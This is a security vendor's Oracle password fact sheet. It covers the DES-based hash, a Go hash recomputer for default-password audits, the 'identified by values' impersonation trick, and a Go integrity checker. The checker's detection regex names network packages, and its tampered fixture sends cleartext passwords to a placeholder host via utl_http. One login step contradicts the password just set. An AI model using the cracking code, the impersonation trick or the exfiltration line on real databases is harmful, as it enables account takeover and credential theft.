Red-Database-Security GmbH is a specialist for Oracle security.
Fact sheet about Oracle database passwords

Oracle Password Algorithm (designed by Bob Baldwin)
- Passwords are up to 30 characters long.
- All characters are converted to uppercase before hashing starts.
- The result is an 8-byte hash, produced with a modified DES encryption algorithm and without a real salt.
- The algorithm can be found in the book "Special Ops: Host and Network Security for Microsoft, UNIX, and Oracle" on page 727.
Oracle Password Cracker
A comparison of different password crackers can be found here.

Location of Oracle password hashes
Show Oracle password hashkey
You should always select database users from the underlying table, not from the views (ALL_USERS, DBA_USERS). An explanation (modification of database views via rootkits) can be found here.
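The recommendation above (read the hashes from the base table) and the algorithm description at the top of this page come together in a default-password audit: recompute the hash for each account and every candidate password and compare it with the stored value. The Go program below is an added example written for this page; it is not code from Red-Database-Security or from their checkpwd tool. It assumes the stored hashes were read from the base table (SYS.USER$, columns NAME and PASSWORD, which the page does not name), and the exact DES steps (fixed first-round key 0x0123456789ABCDEF, all-zero IV, two CBC passes with the last ciphertext block of the first pass used as the second key) come from the published algorithm, not from this page. The account APPUSER, its password and the candidate list are constructed sample data; SCOTT's hash is the one printed further down on this page.

```go
package main

import (
	"crypto/cipher"
	"crypto/des"
	"encoding/hex"
	"errors"
	"fmt"
	"strings"
)

// OracleHash recomputes the legacy (pre-11g) Oracle password hash described on
// this page: username and password are concatenated and uppercased, so the
// username is the only "salt", and the result is pushed twice through DES-CBC.
func OracleHash(username, password string) (string, error) {
	s := strings.ToUpper(username + password)
	if s == "" {
		return "", errors.New("empty username and password")
	}
	// Oracle widens every character to two bytes (high byte zero, i.e. UTF-16BE for ASCII).
	buf := make([]byte, 0, 2*len(s)+des.BlockSize)
	for i := 0; i < len(s); i++ {
		buf = append(buf, 0x00, s[i])
	}
	// Zero-pad to a multiple of the DES block size.
	if rem := len(buf) % des.BlockSize; rem != 0 {
		buf = append(buf, make([]byte, des.BlockSize-rem)...)
	}
	iv := make([]byte, des.BlockSize) // all-zero IV in both rounds
	// Fixed first-round key 0x0123456789ABCDEF (part of the published algorithm, assumed here).
	key1 := []byte{0x01, 0x23, 0x45, 0x67, 0x89, 0xAB, 0xCD, 0xEF}
	key2, err := desCBCLastBlock(key1, iv, buf)
	if err != nil {
		return "", err
	}
	// Round two: the last ciphertext block of round one is the key; the last
	// ciphertext block of round two is the stored hash.
	out, err := desCBCLastBlock(key2, iv, buf)
	if err != nil {
		return "", err
	}
	return strings.ToUpper(hex.EncodeToString(out)), nil
}

// desCBCLastBlock encrypts data with DES-CBC and returns only the final block.
func desCBCLastBlock(key, iv, data []byte) ([]byte, error) {
	block, err := des.NewCipher(key)
	if err != nil {
		return nil, err
	}
	ct := make([]byte, len(data))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(ct, data)
	return ct[len(ct)-des.BlockSize:], nil
}

// Account is one row as read from the base table (assumed: SYS.USER$ NAME, PASSWORD).
type Account struct {
	Name string
	Hash string
}

// FindDefaultPasswords recomputes the hash of every (account, candidate) pair and
// returns the accounts whose stored hash matches a candidate, i.e. the accounts
// that still use a default or dictionary password.
func FindDefaultPasswords(accounts []Account, candidates []string) map[string]string {
	found := map[string]string{}
	for _, a := range accounts {
		for _, pw := range candidates {
			h, err := OracleHash(a.Name, pw)
			if err == nil && h == strings.ToUpper(a.Hash) {
				found[a.Name] = pw
				break
			}
		}
	}
	return found
}

func main() {
	// Constructed sample input: SCOTT's hash is the one printed on this page;
	// APPUSER is an invented account whose hash is computed from an invented password.
	appHash, _ := OracleHash("APPUSER", "Zq7!vL2x")
	accounts := []Account{
		{Name: "SCOTT", Hash: "F894844C34402B67"},
		{Name: "APPUSER", Hash: appHash},
	}
	// Constructed candidate list; a real audit would use the page's 600+ default password list.
	candidates := []string{"TIGER", "WELCOME", "PASSWORD"}
	fmt.Println(FindDefaultPasswords(accounts, candidates)) // map[SCOTT:TIGER]
}
```

Because the "salt" is just the username, the same password gives the same hash for the same account name on every database, which is why a static list of default account/password pairs can be checked without any per-database work; the audit only ever compares hashes you already hold and never has to log in.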
How to change an Oracle password?
You should always use the password command, because with the alter user syntax the password is sent unencrypted over the network (unless the Advanced Security Option is in use).
How to change an Oracle password temporarily?
In Oracle it is possible to change a password temporarily. This can be useful for DBAs who need to act as a different user.

  SQL> select username,password from dba_users where username='SCOTT';

  USERNAME PASSWORD
  -------- ----------------
  SCOTT    F894844C34402B67

  SQL> alter user scott identified by mypassword;

Now login with the following credentials: scott/tiger

After doing your work you can change the password back by using an undocumented feature called "by values":

  SQL> alter user scott identified by values 'F894844C34402B67';

Oracle default password list
600+ default Oracle passwords

Oracle Password Policy
It is possible to set up a password policy (for strong Oracle passwords). A sample file showing how to do this can be found at $ORACLE_HOME/rdbms/admin/utlpwdmg.sql. If you use this functionality, please be aware that the password policy function has access to the cleartext password (for comparison purposes). A hacker could modify your function and log all cleartext passwords entered by the users to a table, or send them to a foreign webserver with utl_http. That's why you should checksum this function, e.g. with Repscan.

Oracle brute force attacks / Oracle Password Decryption
It is not possible to decrypt a hash string, but because of the simple Oracle salt (= username) a brute force or dictionary attack is possible. Several Oracle brute force and dictionary attack tools are available. These tools encrypt the username/password combination and compare the resulting hashkey with the stored one; if the hashkeys are identical, the password is known. They range from simple SQL-based tools (<500 passwords/second) up to special C programs like checkpwd. The fastest tool calculates 1,100,000 passwords/second. On a Pentium 4 with 3 GHz it takes (26 ASCII characters only, e.g. 26^5)
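The password policy section above recommends checksumming the verify function because it sees every cleartext password. The Go program below is an added example for this page (not code from Red-Database-Security or from Repscan) showing the two checks a monitoring job would run over the function text as read back from the data dictionary: compare a SHA-256 checksum against the baseline recorded when the function was installed, and flag calls that have no place in a password-complexity function (network and file packages, INSERT, dynamic SQL). The PL/SQL source lines are constructed and only resemble utlpwdmg.sql; the table name pw_log and the host example.invalid are placeholders.

```go
package main

import (
	"crypto/sha256"
	"encoding/hex"
	"fmt"
	"regexp"
	"strings"
)

// ChecksumSource hashes the function text as you would read it back from the
// data dictionary, one line per row in line order. Trailing whitespace is
// dropped so that a cosmetic re-extraction does not produce a false alarm.
func ChecksumSource(lines []string) string {
	h := sha256.New()
	for _, l := range lines {
		h.Write([]byte(strings.TrimRight(l, " \t\r") + "\n"))
	}
	return hex.EncodeToString(h.Sum(nil))
}

// A password verify function only needs string comparisons; any of these calls
// means the cleartext password may be written somewhere or sent off the host.
var riskyCalls = regexp.MustCompile(
	`(?i)\b(UTL_HTTP|UTL_TCP|UTL_SMTP|UTL_FILE|UTL_INADDR|DBMS_PIPE|INSERT\s+INTO|EXECUTE\s+IMMEDIATE)\b`)

// FindRiskyCalls returns every suspicious call together with its line number.
func FindRiskyCalls(lines []string) []string {
	var hits []string
	for i, l := range lines {
		for _, m := range riskyCalls.FindAllString(l, -1) {
			hits = append(hits, fmt.Sprintf("line %d: %s", i+1, strings.ToUpper(m)))
		}
	}
	return hits
}

// VerifyFunctionIntact combines both checks against a baseline checksum that
// was recorded when the function was installed from utlpwdmg.sql.
func VerifyFunctionIntact(lines []string, baseline string) (bool, []string) {
	var problems []string
	if got := ChecksumSource(lines); got != baseline {
		problems = append(problems, "checksum mismatch: "+got)
	}
	problems = append(problems, FindRiskyCalls(lines)...)
	return len(problems) == 0, problems
}

// Constructed, minimal verify function in the style of utlpwdmg.sql (not Oracle's file).
var goodSource = []string{
	"FUNCTION verify_function (username VARCHAR2, password VARCHAR2, old_password VARCHAR2)",
	"RETURN BOOLEAN IS",
	"BEGIN",
	"  IF LENGTH(password) < 8 THEN",
	"    raise_application_error(-20001, 'Password length less than 8');",
	"  END IF;",
	"  RETURN TRUE;",
	"END;",
}

// tamperedSource is a constructed copy that logs the cleartext password to a
// table and ships it to an outside host, the two cases the page warns about.
func tamperedSource() []string {
	t := append([]string{}, goodSource[:3]...)
	t = append(t,
		"  INSERT INTO pw_log VALUES (username, password);",
		"  utl_http.request('http://example.invalid/' || username || ':' || password);")
	return append(t, goodSource[3:]...)
}

func main() {
	baseline := ChecksumSource(goodSource) // in practice stored at install time
	for name, src := range map[string][]string{"installed": goodSource, "tampered": tamperedSource()} {
		ok, problems := VerifyFunctionIntact(src, baseline)
		fmt.Printf("%s: intact=%v %v\n", name, ok, problems)
	}
}
```

The checksum catches any change, including ones the keyword scan would miss; the keyword scan gives an immediate reason when the checksum differs and still fires if the baseline itself was recorded after a modification. Run both, and keep the baseline outside the database so a rootkit that alters the dictionary views cannot also alter the reference value.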
You should always use strong and long passwords to avoid brute force or dictionary attacks.

Typical error messages related to Oracle database passwords
The following error messages are related to Oracle passwords:
Oracle database passwords in cleartext
Cleartext passwords can typically (but not necessarily) be found at the following places:
© 2005-2006 by Red-Database-Security GmbH - last update 21-Apr-2006
Oracle Patch Policy
More information is available on Oracle OTN: Security Vulnerability Fixing Policy and Process